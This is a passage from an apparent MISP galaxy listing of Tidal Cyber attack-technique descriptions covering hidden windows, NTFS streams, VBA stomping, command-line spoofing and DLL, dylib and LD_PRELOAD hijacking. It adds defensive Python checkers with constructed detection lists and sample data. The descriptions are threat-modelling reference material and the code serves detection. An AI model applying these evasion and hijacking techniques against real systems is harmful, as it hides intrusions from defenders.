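constructed in-memory stand-ins: the parsed com.apple.loginwindow plist, per-user
attributes as `dscl . -read` reports them (plus an assumed HomeFlags field
carrying the chflags output for the home folder), and the values under the
Winlogon SpecialAccounts\\UserList Registry key.
"""

# Built-in accounts that legitimately sit below UID 500 without an underscore prefix.
SYSTEM_ACCOUNTS = {"root", "daemon", "nobody"}


def hidden_macos_users(loginwindow_prefs, users):
    """Return {username: [reasons]} for accounts hidden from the macOS login screen."""
    hide500 = bool(loginwindow_prefs.get("Hide500Users", False))
    findings = {}
    for name, attrs in users.items():
        uid = int(attrs.get("UniqueID", -1))
        if name in SYSTEM_ACCOUNTS or (name.startswith("_") and uid < 500):
            continue  # Apple's own service accounts (_spotlight, _www, ...) live below 500 by design
        reasons = []
        if str(attrs.get("IsHidden", "0")) == "1":
            reasons.append("IsHidden attribute is 1 (set via dscl)")
        if hide500 and uid < 500:
            reasons.append(f"UniqueID {uid} is below 500 while Hide500Users is TRUE")
        if "hidden" in str(attrs.get("HomeFlags", "")).split(","):
            reasons.append("home folder carries the chflags 'hidden' flag")
        if reasons:
            findings[name] = reasons
    return findings


def hidden_windows_users(userlist_values):
    """Return {username: [reasons]} for accounts whose UserList value is 0."""
    return {name: ["SpecialAccounts\\UserList value is 0 (hidden from the logon screen)"]
            for name, value in userlist_values.items() if value == 0}


def audit_hidden_accounts(loginwindow_prefs, macos_users, userlist_values):
    """Combine both platform checks into one report keyed by platform."""
    return {"macos": hidden_macos_users(loginwindow_prefs, macos_users),
            "windows": hidden_windows_users(userlist_values)}


# Constructed sample data, not taken from any real host.
SAMPLE_LOGINWINDOW = {"Hide500Users": True}
SAMPLE_MACOS_USERS = {
    "root": {"UniqueID": "0"},
    "_spotlight": {"UniqueID": "89"},
    "alice": {"UniqueID": "501"},
    "svc_backup": {"UniqueID": "499", "HomeFlags": "hidden"},
    "helpdesk": {"UniqueID": "502", "IsHidden": "1"},
}
SAMPLE_USERLIST = {"alice": 1, "svc_backup": 0}

if __name__ == "__main__":
    for platform, hits in audit_hidden_accounts(SAMPLE_LOGINWINDOW, SAMPLE_MACOS_USERS,
                                                SAMPLE_USERLIST).items():
        for name, reasons in hits.items():
            print(f"[{platform}] {name}: {'; '.join(reasons)}")
```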

The tag is: misp-galaxy:technique="Hidden Users"

Hidden Window

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, scripting languages such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), Jscript, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) offer a variety of features to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. <sup>[[PowerShell About 2019](https://app.tidalcyber.com/references/2c504602-4f5d-47fc-9780-e1e5041a0b3a)]</sup>

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.<sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>

The tag is: misp-galaxy:technique="Hidden Window"

Ignore Process Interrupts

Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.<sup>[[Linux Signal Man](https://app.tidalcyber.com/references/63483956-fa3e-52da-a834-b3b762c4e84e)]</sup> These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.

Adversaries may invoke processes using nohup, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) -ErrorAction SilentlyContinue, or similar commands that may be immune to hangups.<sup>[[nohup Linux Man](https://app.tidalcyber.com/references/f61dde91-3518-5a74-8eb8-bb3bae43e8fb)]</sup><sup>[[Microsoft PowerShell SilentlyContinue](https://app.tidalcyber.com/references/ece52a64-1c8d-547d-aedc-ff43d7418cd2)]</sup> This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.

Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://app.tidalcyber.com/technique/82c07e34-9f67-4f4e-a513-c22a17b508e5) this does not establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) since the process will not be re-invoked once actually terminated.

The tag is: misp-galaxy:technique="Ignore Process Interrupts"

NTFS File Attributes

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> Within MFT entries are file attributes, <sup>[[Microsoft NTFS File Attributes Aug 2010](https://app.tidalcyber.com/references/dc4689d2-54b4-4310-ac10-6b234eedbc16)]</sup> such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> <sup>[[Microsoft File Streams](https://app.tidalcyber.com/references/ef3f58da-e735-4b1d-914c-fafabb7439bf)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup> <sup>[[Microsoft ADS Mar 2014](https://app.tidalcyber.com/references/eae434ff-97c0-4a82-9f80-215e515befae)]</sup>

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. <sup>[[Journey into IR ZeroAccess NTFS EA](https://app.tidalcyber.com/references/e9dff187-fe7d-469d-81cb-30ad520dbd3d)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>
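A triage helper for the Alternate Data Streams discussed above, as an added example that is not part of the MISP galaxy or of Tidal Cyber's material. It parses the stream lines that <code>dir /r</code> prints on Windows; the listing embedded below is constructed to mimic that layout and is not a real capture.

```python
"""Triage Alternate Data Streams from captured `dir /r` output.

Added example, not code from the MISP galaxy or from Tidal Cyber. The listing
is constructed to mimic the layout `dir /r` prints (a stream line carries only
a size followed by <file>:<stream>:$DATA); it is not a real capture.
"""
import re

# Stream lines in `dir /r` output: size, then <file>:<stream>:$DATA.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(?P<file>.+?):(?P<stream>[^:]+):\$DATA\s*$")

# Named streams that Windows and common software create routinely.
BENIGN_STREAMS = {"Zone.Identifier"}  # Mark-of-the-Web written by browsers and Explorer
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".scr")


def parse_streams(listing):
    """Return (file, stream, size_bytes) for every named $DATA stream in a dir /r listing."""
    streams = []
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            streams.append((m["file"].strip(), m["stream"], int(m.group(1).replace(",", ""))))
    return streams


def triage_streams(listing, size_threshold=4096):
    """Return [(file:stream, [reasons])] for streams that deserve analyst attention."""
    findings = []
    for file, stream, size in parse_streams(listing):
        if stream in BENIGN_STREAMS:
            continue
        reasons = ["non-standard named stream"]
        if stream.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("stream name has an executable extension")
        if size >= size_threshold:
            reasons.append(f"stream is {size} bytes, large enough to hold a payload")
        findings.append((f"{file}:{stream}", reasons))
    return findings


# Constructed sample listing in dir /r layout (not a real directory).
SAMPLE_LISTING = """\
 Volume in drive C has no label.
 Directory of C:\\Users\\alice\\Downloads

01/02/2024  10:05 AM            12,345 report.pdf
                                    26 report.pdf:Zone.Identifier:$DATA
01/02/2024  10:06 AM               120 notes.txt
                                54,272 notes.txt:payload.exe:$DATA
01/02/2024  10:07 AM                 0 readme.txt
                                   512 readme.txt:config:$DATA
"""

if __name__ == "__main__":
    for name, reasons in triage_streams(SAMPLE_LISTING):
        print(f"[!] {name}: {'; '.join(reasons)}")
```

Streams flagged this way can be extracted for analysis with tools that read the stream directly (for example <code>Get-Content -Stream</code> in PowerShell) rather than only by looking at the host file.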

The tag is: misp-galaxy:technique="NTFS File Attributes"

Process Argument Spoofing

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.<sup>[[Microsoft PEB 2021](https://app.tidalcyber.com/references/e0ec4cf6-1e6a-41ab-8704-a66c5cc4d226)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup>

Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.<sup>[[Cobalt Strike Arguments 2019](https://app.tidalcyber.com/references/e845f741-eabe-469b-97c1-f51a2aeb18b0)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup><sup>[[Nviso Spoof Command Line 2020](https://app.tidalcyber.com/references/a3fa92ed-763c-4082-8220-cab82d70fad4)]</sup>

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup>

This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://app.tidalcyber.com/technique/449abc18-9faf-4ea6-a420-34528c28301d)) to manipulate or further evade process-based detections.

The tag is: misp-galaxy:technique="Process Argument Spoofing"

Resource Forking

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.<sup>[[macOS Hierarchical File System Overview](https://app.tidalcyber.com/references/4b8b110a-fc40-4094-a70d-15530bc05fec)]</sup> Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.<sup>[[Resource and Data Forks](https://app.tidalcyber.com/references/b8eaf053-40e0-414e-a89e-409dbf218554)]</sup><sup>[[ELC Extended Attributes](https://app.tidalcyber.com/references/e62d67ed-48d0-4141-aacc-92e165d66f16)]</sup>

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.<sup>[[sentinellabs resource named fork 2020](https://app.tidalcyber.com/references/0008dfd8-25a1-4e6a-9154-da7bcbb7daa7)]</sup><sup>[[tau bundlore erika noerenberg 2020](https://app.tidalcyber.com/references/1c62ed57-43f7-40d7-a5c9-46b40a40af0e)]</sup>

The tag is: misp-galaxy:technique="Resource Forking"

Run Virtual Instance

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.<sup>[[SingHealth Breach Jan 2019](https://app.tidalcyber.com/references/d1f699e3-7c9d-4a95-ad58-f46e665a4d37)]</sup>

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>

The tag is: misp-galaxy:technique="Run Virtual Instance"

VBA Stomping

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.<sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup>

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.<sup>[[Evil Clippy May 2019](https://app.tidalcyber.com/references/aafa27e8-5df7-4fc6-9fe5-9a438f2b507a)]</sup><sup>[[Microsoft _VBA_PROJECT Stream](https://app.tidalcyber.com/references/70c75ee4-4ba4-4124-8001-0fadb49a5ac6)]</sup>

An adversary may hide malicious VBA code by overwriting the VBA source code location with zeros, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.<sup>[[Walmart Roberts Oct 2018](https://app.tidalcyber.com/references/d1c88a57-85f4-4a35-a7fa-35e8c7fcd943)]</sup><sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup><sup>[[pcodedmp Bontchev](https://app.tidalcyber.com/references/3057d857-6984-4247-918b-952b75ee152e)]</sup>

The tag is: misp-galaxy:technique="VBA Stomping"

Hide Artifacts

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup><sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>

The tag is: misp-galaxy:technique="Hide Artifacts"

COR_PROFILER

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.<sup>[[Microsoft Profiling Mar 2017](https://app.tidalcyber.com/references/eb0909ea-616c-4d79-b145-ee2f1ae539fb)]</sup><sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.<sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) provided by .NET processes.<sup>[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]</sup><sup>[[Red Canary COR_PROFILER May 2020](https://app.tidalcyber.com/references/3d8cb4d3-1cbe-416a-95b5-15003cbc2beb)]</sup><sup>[[Almond COR_PROFILER Apr 2019](https://app.tidalcyber.com/references/a49c5870-2a48-4cd7-8b4e-e80c5414f565)]</sup><sup>[[GitHub OmerYa Invisi-Shell](https://app.tidalcyber.com/references/26c1b8f4-ff59-409e-b616-04eee38a8a9f)]</sup><sup>[[subTee .NET Profilers May 2017](https://app.tidalcyber.com/references/6ef42019-5393-423e-811d-29b728c877e1)]</sup>

The tag is: misp-galaxy:technique="COR_PROFILER"

DLL Search Order Hijacking

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. <sup>[[Microsoft Dynamic Link Library Search Order](https://app.tidalcyber.com/references/7b1f945b-2547-4bc6-98bf-30248bdf3587)]</sup><sup>[[FireEye Hijacking July 2010](https://app.tidalcyber.com/references/536f9987-f3b6-4d5f-8a6b-32a0c651500d)]</sup> Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, <sup>[[OWASP Binary Planting](https://app.tidalcyber.com/references/86fc5a62-385e-4c56-9812-138db0808fba)]</sup> by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.<sup>[[FireEye fxsst June 2011](https://app.tidalcyber.com/references/06f8f5b2-2ebe-4210-84b6-f86e911a7118)]</sup> Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. <sup>[[Microsoft Security Advisory 2269637](https://app.tidalcyber.com/references/fa3d303e-bb1a-426d-9387-e92fc1ea75bc)]</sup>

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.<sup>[[Microsoft Dynamic-Link Library Redirection](https://app.tidalcyber.com/references/72458590-ee1b-4447-adb8-ca4f486d1db5)]</sup><sup>[[Microsoft Manifests](https://app.tidalcyber.com/references/e336dc02-c7bb-4046-93d9-17b9512fb731)]</sup><sup>[[FireEye DLL Search Order Hijacking](https://app.tidalcyber.com/references/0ba2675d-4d7f-406a-81fa-b87e62d7a539)]</sup>

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:technique="DLL Search Order Hijacking"

DLL Side-Loading

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.<sup>[[FireEye DLL Side-Loading](https://app.tidalcyber.com/references/9d58bcbb-5b96-4e12-8ff2-e0b084c3eb8c)]</sup>

The tag is: misp-galaxy:technique="DLL Side-Loading"

Dylib Hijacking

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.<sup>[[Wardle Dylib Hijack Vulnerable Apps](https://app.tidalcyber.com/references/128b4e3f-bb58-45e0-b8d9-bff9fc3ec3df)]</sup><sup>[[Wardle Dylib Hijacking OSX 2015](https://app.tidalcyber.com/references/c78d8c94-4fe3-4aa9-b879-f0b0e9d2714b)]</sup><sup>[[Github EmpireProject HijackScanner](https://app.tidalcyber.com/references/c83e8833-9648-4178-b5be-6fa0af8f737f)]</sup><sup>[[Github EmpireProject CreateHijacker Dylib](https://app.tidalcyber.com/references/2908418d-54cf-4245-92c6-63f616b04e91)]</sup> Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup><sup>[[wardle artofmalware volume1](https://app.tidalcyber.com/references/53d0279e-4f30-4bbe-a9c7-90e36cd81570)]</sup><sup>[[MalwareUnicorn macOS Dylib Injection MachO](https://app.tidalcyber.com/references/61aae3a4-317e-4117-a02a-27885709fb07)]</sup>

The tag is: misp-galaxy:technique="Dylib Hijacking"

Dynamic Linker Hijacking

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup><sup>[[Apple Doco Archive Dynamic Libraries](https://app.tidalcyber.com/references/e3b8cc52-2096-418c-b291-1bc76022961d)]</sup> These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.<sup>[[Baeldung LD_PRELOAD](https://app.tidalcyber.com/references/6fd6ea96-1cf4-4169-8069-4f29dbc9f217)]</sup>

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) to export variables in a shell or set variables programmatically using higher level syntax such as Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary’s malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup> Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.<sup>[[Code Injection on Linux and macOS](https://app.tidalcyber.com/references/82d41fd8-495d-41b6-b908-6ada5764c94d)]</sup><sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup> <sup>[[Phrack halfdead 1997](https://app.tidalcyber.com/references/9b3f0dc7-d830-43c5-8a5b-ad3c811920c5)]</sup><sup>[[Brown Exploiting Linkers](https://app.tidalcyber.com/references/24674e91-5cbf-4023-98ae-a9f0968ad99a)]</sup>

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic linker (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.<sup>[[TheEvilBit DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/bd27026c-81eb-480e-b092-f861472ac775)]</sup><sup>[[Timac DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/54fcbc49-f4e3-48a4-9d67-52ca08b322b2)]</sup><sup>[[Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass](https://app.tidalcyber.com/references/67f3ce33-0197-41ef-a9d0-474c97ecf570)]</sup>
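A check for the two preload mechanisms named above (the environment variables and <code>/etc/ld.so.preload</code>), added here as an example that is not part of the galaxy entry or its references. It parses the NUL-separated block of <code>/proc/&lt;pid&gt;/environ</code> and the contents of <code>/etc/ld.so.preload</code>, then flags entries that live outside the usual library directories, sit in temporary or user-writable locations, or reuse the name of a core system library, the last being the "matches the name of legitimate libraries" pattern described above. The directory lists, the library-name list and the sample environment are constructed.

```python
"""Flag dynamic-linker preload entries from a process environment and /etc/ld.so.preload."""
import re
from typing import Dict, List

PRELOAD_VARS = ("LD_PRELOAD", "DYLD_INSERT_LIBRARIES")
# Where shared libraries normally live (constructed allow-list).
SYSTEM_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/",
                   "/System/Library/", "/usr/lib/system/")
# Locations an unprivileged user can write to (constructed deny-list).
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Core library names a planted library may borrow (constructed list).
MASQUERADE_NAMES = {"libc.so.6", "libdl.so.2", "libpthread.so.0",
                    "libselinux.so.1", "libaudit.so.1"}


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Parse the NUL-separated KEY=VALUE block of /proc/<pid>/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


def split_preload_value(value: str) -> List[str]:
    """LD_PRELOAD items may be separated by spaces or colons (ld.so(8))."""
    return [p for p in re.split(r"[:\s]+", value) if p]


def parse_ld_so_preload(text: str) -> List[str]:
    """Whitespace-separated list of objects; glibc ignores text after '#'."""
    libs = []
    for line in text.splitlines():
        libs.extend(line.split("#", 1)[0].split())
    return libs


def assess_entry(lib: str, source: str) -> dict:
    """Attach review reasons to one preload entry."""
    reasons = []
    if not lib.startswith("/"):
        reasons.append("relative name, resolved through the library search path")
    else:
        outside = not lib.startswith(SYSTEM_LIB_DIRS)
        if outside:
            reasons.append("outside system library directories")
        if lib.startswith(STAGING_DIRS):
            reasons.append("located in a temporary or user-writable directory")
        if "/." in lib:
            reasons.append("hidden path component")
        if outside and lib.rsplit("/", 1)[-1] in MASQUERADE_NAMES:
            reasons.append("reuses the name of a core system library")
    return {"library": lib, "source": source, "reasons": reasons,
            "severity": "high" if reasons else "info"}


def assess_preloads(environ: bytes, ld_so_preload: str) -> List[dict]:
    """Findings for every preload entry seen in a process environment and the system file."""
    findings = []
    env = parse_environ(environ)
    for var in PRELOAD_VARS:
        for lib in split_preload_value(env.get(var, "")):
            findings.append(assess_entry(lib, var))
    for lib in parse_ld_so_preload(ld_so_preload):
        findings.append(assess_entry(lib, "/etc/ld.so.preload"))
    return findings


# Constructed sample input: one process environment block and one preload file.
SAMPLE_ENVIRON = (b"PATH=/usr/sbin:/usr/bin:/sbin:/bin\0"
                  b"LD_PRELOAD=/dev/shm/.cache/libc.so.6:/usr/lib/libproxy-shim.so\0"
                  b"HOME=/root\0")
SAMPLE_LD_SO_PRELOAD = "# constructed sample\n/usr/lib64/libvendor-hook.so   /tmp/libhook.so\n"

if __name__ == "__main__":
    for f in assess_preloads(SAMPLE_ENVIRON, SAMPLE_LD_SO_PRELOAD):
        print(f"{f['severity']:4} {f['source']}: {f['library']}  {'; '.join(f['reasons'])}")
```

Reading <code>/proc/&lt;pid&gt;/environ</code> rather than the parent shell matters because the variable only needs to exist in the victim's environment at exec time; the file-based <code>/etc/ld.so.preload</code> path affects every dynamically linked program on the host and is the one to baseline and monitor for writes.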

The tag is: misp-galaxy:technique="Dynamic Linker Hijacking"

Executable Installer File Permissions Weakness

